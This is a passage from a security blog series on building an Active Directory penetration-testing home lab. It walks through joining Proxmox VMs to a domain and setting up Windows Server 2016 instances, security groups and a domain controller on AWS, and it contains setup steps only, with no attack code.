3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?<br />
<br />
Here are things to look for:<br />
<br />
Network Config Settings <br />
--- Did you give your DC the right subnet mask when you configured the static IP?<br />
--- Did you configure the primary DNS server properly on your non-DC host? <br />
<br />
Are you typing in the right domain name when attempting to add your host?<br />
<br />
<h3>
Adding domain users to the remote desktop group</h3>
<div>
You might not ever even need to RDP to your hosts because the proxmox console is pretty good. I still like to do this anyway though. </div>
<h3>
<div style="font-size: medium; font-weight: normal;">
<div>
<div>
1) Select the folder icon in the task bar</div>
<div>
2) Right click <b>This PC</b></div>
<div>
3) Click <b>Properties</b></div>
</div>
<div>
4) On the left, click <b>Remote Settings</b>, and enter the domain administrator credentials</div>
<div>
5) In the <b>Remote Desktop</b> section of the window, click <b>Select Users...</b></div>
<div>
6) Click <b>Add...</b></div>
<div>
7) Type <b>Domain users </b> and click <b>Check Names</b></div>
<div>
8) Click <b>OK, OK, OK</b></div>
<div>
<b><br /></b></div>
<div>
You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)</div>
</div>
</h3>
<h2>
</h2>
<h2>
VM #4: Creating our Windows 10 Template</h2>
<div>
Everything you need to configure a Windows 10 VM and add it to the domain should is shown above in one way or another. Here is the high level approach: </div>
<div>
<br /></div>
<div>
1) Create the Windows10 VM</div>
<div>
2) Install Windows10 using the ISO we downloaded earlier</div>
<div>
3) Configure the OS with any custom configurations or software before turning it into a template</div>
<div>
4) Turn VM#4, this VM, into a template</div>
<div>
<br /></div>
<div>
<h2>
VM #5 & #6: Creating two Windows 10 VMs from the template</h2>
</div>
<div>
<div>
1) Clone the template to be one Windows10 VM at minimum, but feel free to use 2 or 3 VMs</div>
<div>
2) Configure DNS to point to domain controller</div>
<div>
3) Configure host name</div>
<div>
4) Add VM to the domain<br />
5) Enable file and printer sharing<br />
6) Add domain users to the Remote Desktop group</div>
</div>
<h3>
</h3>
<br />
<h2>
Wrap Up</h2>
</div>
<div>
You did it! You should now have 1 DC, and 1-3 additional hosts set up in ProxmoxVE. You are now ready to try all sorts of stuff, like CrackMapExec, Empire, Metasploit, Mimikatz, Kerberoasting, and more. My next posts will walk through running these tools against your active directory pentest lab.<br />
<br />
Are there any specific tools or techniques related to penetration active directory you would like me to cover? If so, leave a comment! If I know how to do it, I'll cover it. If I don't, I'll try to learn it and then I'll cover it!</div>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-48830929512679399292017-05-04T17:32:00.001-04:002017-12-02T22:35:33.789-05:00Pentest Home Lab - 0x1 - Building Your AD Lab on AWSIn <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, we talked about why you would want to build your own AD pentest lab, where you can build it (cloud vs on-premises options), and the pros and cons of each option.<br />
<br />
This post covers building your lab on AWS. Even if you have a lab at home, setting up a small second home lab on AWS is a worthwhile exercise. You'll learn a lot about AWS in the process. <br />
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
<br />
<h2>
Table of Contents</h2>
<ul>
<li>What are we going to build?</li>
<li>Creating your AWS instances</li>
<ul>
<li>Instance #1: This will be the Domain Controller</li>
<li>Instance #2: This will be Workstation01 </li>
<ul>
<li>Disable IE Enhanced Security Configuration</li>
</ul>
<li>Instances #3 & #4 (Optional)</li>
<li>Create security groups so that your LAN hosts can talk to each other</li>
</ul>
<li>Creating the Domain</li>
<ul>
<li>Setting up WindowsServer2016-1 to be a Domain Controller</li>
<ul>
<li>Configure a static IP (Required)</li>
<li>Change the hostname (Optional)</li>
<li>Promote the server to a Domain Controller</li>
</ul>
<li>You now have an Active Directory Domain - Add some users</li>
<li>Add at least one admin user to your domain admins group</li>
<li>The Homestretch - Add all hosts to the domain</li>
<ul>
<li>Configure DNS</li>
<li>Add hosts to the domain</li>
<li>Add domain users to the remote desktop group</li>
</ul>
</ul>
</ul>
<br />
<h3>
What are we going to build?</h3>
<div>
At the end of this post, <b>you will have a fully functional AD environment in AWS</b> that you can use to make yourself a better penetration tester. I'm not going to assume you are familiar with AWS or setting up Active Directory, so some of this might be review. </div>
<div>
<br /></div>
<div>
You will configure 2-4 AWS EC2 instances:</div>
<div>
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rUbKMM6cDnA/WQegsdrQ7mI/AAAAAAAABSY/a3cVHmvhxlg6ALQFFWQTYoEWEfxuA4bTgCEw/s1600/instances2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-rUbKMM6cDnA/WQegsdrQ7mI/AAAAAAAABSY/a3cVHmvhxlg6ALQFFWQTYoEWEfxuA4bTgCEw/s400/instances2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You will create a Windows 2016 domain, promote one server to be a DC, and add additional hosts to the domain:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ih6RMV26IVM/WQf7LNoFXqI/AAAAAAAABUo/wvy4jseyvUUbsaDxviW_UYLezodwQAfQQCEw/s1600/computers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://3.bp.blogspot.com/-ih6RMV26IVM/WQf7LNoFXqI/AAAAAAAABUo/wvy4jseyvUUbsaDxviW_UYLezodwQAfQQCEw/s400/computers.png" width="400" /></a></div>
<br />
You will create at least 2 users and 1 administrator account:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-WtHfWzT6u0I/WQf7LNIYQSI/AAAAAAAABUo/IHxF8-plsRQ56xe8K7YeMEMAg1gVZxgAACEw/s1600/users.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://2.bp.blogspot.com/-WtHfWzT6u0I/WQf7LNIYQSI/AAAAAAAABUo/IHxF8-plsRQ56xe8K7YeMEMAg1gVZxgAACEw/s400/users.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non DC server. </div>
<br />
<b>Note:</b> If you missed my last post, I mentioned that AWS does not provide an AMI (AMIs are like images) for Windows 7/8/10. I also mentioned that while not a true replica of what we run into on the job, I have found that you can just treat servers as if they were clients, and it is good enough. In other words, you have everything you need to simulate a compromised victim's workstation for the purposes of our testing with Windows Server 2012/2016. So for our AWS lab, our <i>workstations</i> will just be additional Windows 2016 servers. <br />
<br />
One last thing. To understand/estimate what your AWS lab will cost you, check out the <b>AWS Math</b> section in my last post: <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>.<br />
<br />
To summarize:<br />
<br />
<ul>
<li><b>EC2</b>: You pay for EC2 instances only for the hours that the instance is running</li>
<li><b>EBS</b>: You pay for EBS volumes from the time they are provisioned to the time they are removed. This means that even if you don't use your lab for the entire month, you will still get charged for the provisioned EBS space. </li>
</ul>
<br />
Some numbers:<br />
<br />
<ul>
<li><b>2 Windows instances, 1 Kali instance, used 30 hours/month on average</b></li>
<ul>
<li>Monthly EC2 Cost: $1.38/month</li>
<li>Monthly EBS Cost: $8/month</li>
<li>Monthly Total: $9.38/month</li>
<li><b>Annual Total: $112</b></li>
</ul>
<li><b>4 Windows instances, 1 Kali instance, used 30 hours/month on average</b></li>
<ul>
<li>Monthly EC2 Cost: $2.36</li>
<li>Monthly EBS Cost: $14</li>
<li>Monthly Total: $16.36</li>
<li><b>Annual Total: $196</b></li>
</ul>
</ul>
<br />
<br />
<h2>
Creating your AWS instances</h2>
<div>
<br /></div>
<h3>
Instance #1: This will be the Domain Controller</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
1) If you have not already, <a href="https://aws.amazon.com/resources/create-account/">Create an AWS account </a><br />
<div>
<br />
2) Once your account is created, log into the <a href="https://aws.amazon.com/console/">AWS Console</a></div>
<div>
<br />
3) Once you log in, under <b>Compute</b>, click <b>EC2</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uI5092wkozE/WQAfBTXnysI/AAAAAAAABOc/Pmnvg8qB-OsvVURl78IHazHaAPSM1HkGACEw/s1600/01%2B-%2BCompute%2B-%2BEC2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-uI5092wkozE/WQAfBTXnysI/AAAAAAAABOc/Pmnvg8qB-OsvVURl78IHazHaAPSM1HkGACEw/s1600/01%2B-%2BCompute%2B-%2BEC2.png" /></a></div>
<div>
<br />
<div>
</div>
<div>
4) Under <b>Create Instance</b>, click <b>Launch Instance</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QQJTh3UCfkU/WQAfBR-JuhI/AAAAAAAABOk/cN5UwabOTqAHGPKcfrdEZ4hxGc5hbuPfQCEw/s1600/02%2B-%2Blaunch%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://4.bp.blogspot.com/-QQJTh3UCfkU/WQAfBR-JuhI/AAAAAAAABOk/cN5UwabOTqAHGPKcfrdEZ4hxGc5hbuPfQCEw/s640/02%2B-%2Blaunch%2Binstance.png" width="640" /></a></div>
<div>
<br />
5) Find <b>Microsoft Windows Server 2016 Base</b> and click <b>Select</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-8AWdUi4-Pc0/WQAfBa2_lYI/AAAAAAAABOg/bAAxX8IXr-gG-BJTi08ioGpTi_2NYWTnACEw/s1600/03%2B-%2Bwindows%2Bserver%2B2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://2.bp.blogspot.com/-8AWdUi4-Pc0/WQAfBa2_lYI/AAAAAAAABOg/bAAxX8IXr-gG-BJTi08ioGpTi_2NYWTnACEw/s640/03%2B-%2Bwindows%2Bserver%2B2016.png" width="640" /></a></div>
<div>
<br />
6) Pick <b>t2.micro</b> (or any other size)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-LrNftBg58Dc/WQAfBpQPP1I/AAAAAAAABOo/6w8PAR1rYSs-cLSoB4Z8xsZdwoKGb9hCgCEw/s1600/04%2B-%2Bsize.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://3.bp.blogspot.com/-LrNftBg58Dc/WQAfBpQPP1I/AAAAAAAABOo/6w8PAR1rYSs-cLSoB4Z8xsZdwoKGb9hCgCEw/s640/04%2B-%2Bsize.png" width="640" /></a></div>
<div>
<br />
7) Click <b>Next: Configure Instance Details</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-61wJS7BbQsY/WQAfBkcbXeI/AAAAAAAABQE/AQqHYA-xmX0kXHFHEb6ntuaivMoOa_TXwCEw/s1600/05%2B-%2BNext%2B-%2Bconfigure%2Binstance%2Bdetails.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://1.bp.blogspot.com/-61wJS7BbQsY/WQAfBkcbXeI/AAAAAAAABQE/AQqHYA-xmX0kXHFHEb6ntuaivMoOa_TXwCEw/s640/05%2B-%2BNext%2B-%2Bconfigure%2Binstance%2Bdetails.png" width="640" /></a></div>
<div>
<br /></div>
<div>
8) Accept defaults and click <b>Next: Add Storage</b> (Or if you are more familiar with AWS, feel free to create a new VPC or a new subnet for this lab) </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ROGNAtatZyw/WQAfB2AW0iI/AAAAAAAABQE/1OXClUT1EYMVES1BU7az3UCZ4MGZLzJIACEw/s1600/06%2B-%2Bnext%2B-%2Badd%2Bstorage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://4.bp.blogspot.com/-ROGNAtatZyw/WQAfB2AW0iI/AAAAAAAABQE/1OXClUT1EYMVES1BU7az3UCZ4MGZLzJIACEw/s640/06%2B-%2Bnext%2B-%2Badd%2Bstorage.png" width="640" /></a></div>
<div>
<br /></div>
<div>
9) Accept defaults and click <b>Next: Add Tags</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-bP58t8kBDAI/WQAfB_f89BI/AAAAAAAABQE/yMkxmyEJ85wCuiQ3umRzF6-N6u3AjtGEQCEw/s1600/07%2B-%2Bnext%2B-%2Badd%2Btags.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="402" src="https://3.bp.blogspot.com/-bP58t8kBDAI/WQAfB_f89BI/AAAAAAAABQE/yMkxmyEJ85wCuiQ3umRzF6-N6u3AjtGEQCEw/s640/07%2B-%2Bnext%2B-%2Badd%2Btags.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
10) Accept defaults and click <b>Next: Configure Security Group</b> </div>
</div>
<div>
<br /></div>
<div>
Time to configure your security group. If you are unfamiliar with security groups, but familiar with traditional firewalls, think about it like this: A security group is like a firewall rule and you apply as many rules as you want to each AWS instance. The combination of applied rules is kind of like your per instance firewall policy.</div>
<div>
<br /></div>
<div>
For your lab, I suggest you limit RDP access to your public ISP assigned address (if you are doing this at work, I suggest using a VPN to connect to your lab). The cool thing is that if this changes, you can just log into the AWS console from anywhere and change the IP in the security group. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-x_BIIuh-LHs/WQAfB7mm5AI/AAAAAAAABQE/tmkLC2GyqwkAbBj5x1e2l2EtDBQ8maNoQCEw/s1600/09%2B-%2Bconfigure%2Bsecurity%2Bgroups.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://3.bp.blogspot.com/-x_BIIuh-LHs/WQAfB7mm5AI/AAAAAAAABQE/tmkLC2GyqwkAbBj5x1e2l2EtDBQ8maNoQCEw/s640/09%2B-%2Bconfigure%2Bsecurity%2Bgroups.png" width="640" /></a></div>
<div>
<br />
11) Click <b>Review</b> and <b>Launch</b>, then <b>Launch</b> </div>
<div>
<br /></div>
<div>
12) If you haven't created an AWS keypair yet, create one. If you have, you know what to do here. </div>
<div>
<br /></div>
<div>
13) <b>Launch Instance</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-iMVlDki3ntk/WQAfCIt7GuI/AAAAAAAABQE/fAczGoZ0KpwzxdsoprGqmlKptgGUkqi-QCEw/s1600/10%2B-%2Bcreate%2Bnew%2Bkeypair.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://4.bp.blogspot.com/-iMVlDki3ntk/WQAfCIt7GuI/AAAAAAAABQE/fAczGoZ0KpwzxdsoprGqmlKptgGUkqi-QCEw/s640/10%2B-%2Bcreate%2Bnew%2Bkeypair.png" width="640" /></a></div>
<div>
<br />
14) Let's go see our new instance. Go to <b>Services</b> > <b>EC2</b> </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-fdGf5rh2Lr8/WQAfCLtcVaI/AAAAAAAABQE/ciNoZnXNkD0LHPs4OsB-KEqkEmJfDJFzgCEw/s1600/11%2B-%2Bback%2Bto%2Bec2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://1.bp.blogspot.com/-fdGf5rh2Lr8/WQAfCLtcVaI/AAAAAAAABQE/ciNoZnXNkD0LHPs4OsB-KEqkEmJfDJFzgCEw/s400/11%2B-%2Bback%2Bto%2Bec2.png" width="400" /></a></div>
<div>
<br />
<div>
15) You will now see a new running instance. Click the <b>Running Instances</b> link </div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/--tFgs5JOAbw/WQAfCPWvHXI/AAAAAAAABQE/fkC4FjrpV_MzDZeBScE4SmDmQXToD3avQCEw/s1600/12%2B-%2Brunning%2Binstances.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://3.bp.blogspot.com/--tFgs5JOAbw/WQAfCPWvHXI/AAAAAAAABQE/fkC4FjrpV_MzDZeBScE4SmDmQXToD3avQCEw/s400/12%2B-%2Brunning%2Binstances.png" width="400" /></a></div>
<div>
<br /></div>
<div>
16) Your new instance will say <b>Initializing</b> under <b>Status Checks</b>. It is a good idea to rename it. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-4khNXFSFABs/WQAfCFbqlaI/AAAAAAAABQE/u2Huj-9aazQmRgvB5t7cSAMPgEaUp3GAQCEw/s1600/13%2B-%2Brename%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://1.bp.blogspot.com/-4khNXFSFABs/WQAfCFbqlaI/AAAAAAAABQE/u2Huj-9aazQmRgvB5t7cSAMPgEaUp3GAQCEw/s640/13%2B-%2Brename%2Binstance.png" width="640" /></a></div>
<div>
<br />
17) While it finishes initializing, find the instance's public IP. You can find it to the right under <b>IPv4 public IP</b>, or in the <b>lower frame</b>, in the <b>description tab</b>, under <b>IPv4 Public IP</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-aAuj5qut8Vg/WQAfCVljfWI/AAAAAAAABQE/RTfU6XtdI5c84oLfo_GObIwyEWSzRo-qACEw/s1600/14%2B-%2Binstance%2Bdescription.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://2.bp.blogspot.com/-aAuj5qut8Vg/WQAfCVljfWI/AAAAAAAABQE/RTfU6XtdI5c84oLfo_GObIwyEWSzRo-qACEw/s640/14%2B-%2Binstance%2Bdescription.png" width="640" /></a></div>
<div>
<br />
18) Select your instance and click <b>Connect</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-vpGmA71hofg/WQAfCV5kBGI/AAAAAAAABQE/0COkBiBW8QsGe_ldv5w5Wyxht4anBrmKwCEw/s1600/17%2B-%2Bdecrypt%2Bpassword.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://2.bp.blogspot.com/-vpGmA71hofg/WQAfCV5kBGI/AAAAAAAABQE/0COkBiBW8QsGe_ldv5w5Wyxht4anBrmKwCEw/s640/17%2B-%2Bdecrypt%2Bpassword.png" width="640" /></a></div>
<div>
<br />
19) Download the RDP file, and point the window to your private key so you can decrypt the random password AWS gave your Windows instance. Once you decrypt that password, save it somewhere safe, like in a password vault (i.e., Keypass, PasswordSafe). </div>
<div>
<br /></div>
<div>
20) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username </div>
<div>
<br /></div>
<div>
21) Enter the decrypted password</div>
<div>
<br /></div>
<div>
22) You are now logged into your first server. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ZnyZDU2sQLw/WQAfC--X9lI/AAAAAAAABQE/Nbx_AKiCfRsBnFGzN-ZFM-60T417MpqCQCEw/s1600/18%2B-%2Brdp%2Bworks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="521" src="https://2.bp.blogspot.com/-ZnyZDU2sQLw/WQAfC--X9lI/AAAAAAAABQE/Nbx_AKiCfRsBnFGzN-ZFM-60T417MpqCQCEw/s640/18%2B-%2Brdp%2Bworks.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<h3>
Instance #2: This will be Workstation01 </h3>
There is a really cool feature within the EC2 console called "Launch More Like This". This launches the EC2 instance wizard and uses the same EC2 settings as the selected instance, such as security groups, sizing preferences, desired subnet, etc. But, this is NOT like cloning a VM. Everything inside the container is going to be vanilla. <br />
<div>
<br /></div>
1) Go back to <b>EC2 dashboard</b> </div>
<div>
<br /></div>
<div>
2) Click on <b>Windows Server 2016-1</b> and click <b>Actions</b>, <b>Launch more like this</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-rq37VWXKOoY/WQAfC6NBACI/AAAAAAAABQE/B9-1MtIEV_0XuBznc5f8XJXbje9IM1NigCEw/s1600/19%2B-%2Blaunch%2Bmore%2Blike%2Bthis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-rq37VWXKOoY/WQAfC6NBACI/AAAAAAAABQE/B9-1MtIEV_0XuBznc5f8XJXbje9IM1NigCEw/s400/19%2B-%2Blaunch%2Bmore%2Blike%2Bthis.png" width="400" /></a></div>
<div>
<br />
3) Click <b>Launch</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-orfcbCNz4eg/WQAfC55XqvI/AAAAAAAABQE/C2CDhKqQ2aQSUPHy5kKvfODNyqgzn9AqQCEw/s1600/20%2B-%2Blaunch%2Bagain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://3.bp.blogspot.com/-orfcbCNz4eg/WQAfC55XqvI/AAAAAAAABQE/C2CDhKqQ2aQSUPHy5kKvfODNyqgzn9AqQCEw/s400/20%2B-%2Blaunch%2Bagain.png" width="400" /></a></div>
<div>
<br />
4) Select same keypair you created last time, and click <b>Launch Instances</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-GUF7Q5lgO5M/WQAfDKe8-II/AAAAAAAABQE/QxyC-l-CgSAs5pEXwWcqcpqHdEKLIiHsQCEw/s1600/21%2B-%2Blaunch%2B2nd%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://1.bp.blogspot.com/-GUF7Q5lgO5M/WQAfDKe8-II/AAAAAAAABQE/QxyC-l-CgSAs5pEXwWcqcpqHdEKLIiHsQCEw/s640/21%2B-%2Blaunch%2B2nd%2Binstance.png" width="640" /></a></div>
5) When it is fully running, download the RDP file again and decrypt the password</div>
<div>
<br />
<div>
<div>
6) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username </div>
<div>
<br /></div>
<div>
7) Enter the decrypted password</div>
<div>
<br /></div>
<div>
8) You are now logged into your second machine</div>
</div>
<div>
<br /></div>
<h4>
Disable IE Enhanced Security Configuration</h4>
<div>
This will make IE act more like Windows10, specifically it will not require you to add every new site to the Trusted Sites list. </div>
<div>
</div>
<div>
1) Open <b>Server Manager</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s1600/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s320/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" width="320" /></a></div>
<div>
<br /></div>
<div>
2) Click <b>Local Server</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
3) In <b>Properties</b>, navigate to <b>IE Enhanced Security Configuration</b>, and click <b>On</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
4) Change both options to <b>Off</b>, and click <b>OK</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8Em5M1Ol4HI/WQfTIYGBQHI/AAAAAAAABSw/AKoTMrHjKks5QOVyPP5UEgNAfoeqjRaMgCLcB/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="536" src="https://3.bp.blogspot.com/-8Em5M1Ol4HI/WQfTIYGBQHI/AAAAAAAABSw/AKoTMrHjKks5QOVyPP5UEgNAfoeqjRaMgCLcB/s640/33.png" width="640" /></a></div>
<div>
<br /></div>
<div>
5) Restart IE</div>
<div>
<br /></div>
<h3>
Instances #3 & #4?</h3>
<div>
You can either stop here and you'll have:</div>
<div>
<br /></div>
<div>
WindowsServer2016-1 - This will be your DC</div>
<div>
WindowsServer2016-2 - This will be your workstation</div>
<div>
<br /></div>
<div>
Or, you can make two more servers and you will have: </div>
<div>
<br /></div>
<div>
<div>
WindowsServer2016-1 - This will be your DC</div>
<div>
WindowsServer2016-2 - This will be user 1's workstation</div>
</div>
<div>
WindowsServer2016-3 - This will be server1</div>
<div>
<div>
WindowsServer2016-4 - This will be user 2's workstation</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
Create security groups so your LAN can talk to each other</h3>
Now that we have spun up all of our servers and have successfully RDP'd to each of them, there is one more thing we need to do before we can create our domain. We need to create an AWS Security Group that allows the hosts on your subnet to talk to each other. </div>
<div>
<br />
<div>
1) On the left navigation bar under <b>Network & Security</b>, select <b>Security Groups</b>, Click <b>Create Security Group</b></div>
<div>
<br /></div>
<div>
2) Name it, allow all traffic inbound from your subnet. You can leave the <b>outbound tab</b> as is. The default is to allow all outbound traffic. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-f2V60pGjXOo/WQfuWHvuSkI/AAAAAAAABUE/gZJ_cOmH3FYlnQlECyaC31rWt_omQcfBQCLcB/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://2.bp.blogspot.com/-f2V60pGjXOo/WQfuWHvuSkI/AAAAAAAABUE/gZJ_cOmH3FYlnQlECyaC31rWt_omQcfBQCLcB/s640/37.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
3) Click <b>Create</b></div>
<div>
<br /></div>
<div>
4) Now we need to apply this security group to all of our Lab instances</div>
<div>
<br /></div>
<div>
5) Go to the <b>EC2</b> view, click <b>Actions</b>, navigate to <b>Networking</b>, and select <b>Change Security Groups</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8pUyrYlbMS8/WQfY2bdeldI/AAAAAAAABTY/kDs8BZNXezIrtF-Xpmcpdp1tnjKZ6WfswCLcB/s1600/35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://4.bp.blogspot.com/-8pUyrYlbMS8/WQfY2bdeldI/AAAAAAAABTY/kDs8BZNXezIrtF-Xpmcpdp1tnjKZ6WfswCLcB/s640/35.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
6) Select the new security group <i>*in addition*</i> to the RDP security group you already have selected</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-7oIc4qdWNzo/WQfY2Sx1daI/AAAAAAAABTU/CGVhsuyN85YtOSmonapDumjKcS9_voODQCEw/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://2.bp.blogspot.com/-7oIc4qdWNzo/WQfY2Sx1daI/AAAAAAAABTU/CGVhsuyN85YtOSmonapDumjKcS9_voODQCEw/s640/36.png" width="640" /></a></div>
<div>
<br /></div>
<div>
7) Click <b>Assign Security Groups</b></div>
<div>
<br /></div>
<div>
8) Repeat this for ALL Lab instances</div>
<h2>
Creating the Domain</h2>
<div>
<br /></div>
<div>
<h3>
Setting up WindowsServer2016-1 to be a Domain Controller</h3>
<div>
There are a few things you'll need to do and some you might want to do before creating your domain and promoting your first server to a domain controller. </div>
<div>
<br /></div>
<h4>
Configure a Static IP (Required)</h4>
<div>
The first thing you want to do is change your private IP from dynamic to static. The private IP address that AWS gives your instance "remains associated with the network interface when the instance is stopped and restarted, and is released when the instance is terminated." So while this address will not change, it is still dynamic as far as your instance is concerned, and will not pass a "promotion to DC" prerequisite check in Server 2016. There might be a better way to do this, but for me, all I did was configure the instance with a static address and I used the AWS assigned dynamic address as the IP address. </div>
<div>
<br /></div>
<div>
1) If you are new to Server 2012/2016, you get to this by right clicking on the networking icon at the bottom left and click <i><b>Open Network and Sharing Center</b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-lXwVAMM2Z2I/WQAlbRiKpkI/AAAAAAAABQc/2mI4I7zSmgwfbGmcplc4ITXEI5_7o5dLwCEw/s1600/27%2B-%2Bupdate%2Bnetwork.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-lXwVAMM2Z2I/WQAlbRiKpkI/AAAAAAAABQc/2mI4I7zSmgwfbGmcplc4ITXEI5_7o5dLwCEw/s1600/27%2B-%2Bupdate%2Bnetwork.png" /></a></div>
